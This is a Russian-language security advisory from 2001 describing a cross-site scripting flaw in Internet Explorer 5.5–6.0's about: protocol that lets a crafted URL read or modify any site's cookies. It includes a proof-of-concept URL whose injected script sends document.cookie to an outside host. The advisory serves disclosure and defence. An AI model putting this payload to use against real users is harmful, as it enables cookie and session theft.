Расскрытие/модификация Cookie в Internet Explorer 5.5-6.0

Дата публикации:
12.11.2001
Всего просмотров:
812
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание:

Internet Explorer содержит уязвимость, которая позволяет нападающему построить URL, который отобразит или изменит информацию cookies, связанную с произвольным web узлом.
Если URL составлен в about:protocol, ссылающийся на web узел, Javascript, внедренный в URL, может обращаться к любому cookies, связанным с web узлом через 'document.cookie'. Выполнение Javascript возможно из-за уязвимости cross-site scripting в about: protocol.
Этот URL покажет содержание cookies, выпущенных 'www.xakep.ru”:

about:// www.xakep.ru/<script%20language=javascript>document.location='http://www.solutions.fi/~jouko/cookies2.cgi?'+document.cookie;</script>

Другие примеры можно просмотреть здесь:

http://www.solutions.fi/index.cgi/extra_iebug?lang=eng

Уязвимая система: Internet Explorer 5.5-6.0.
Более подробно об уязвимостях данного типа можно узнать здесь:
http://www.securitylab.ru/owasp/OWASP-IV-CSS-1.htm

 


или введите имя

CAPTCHA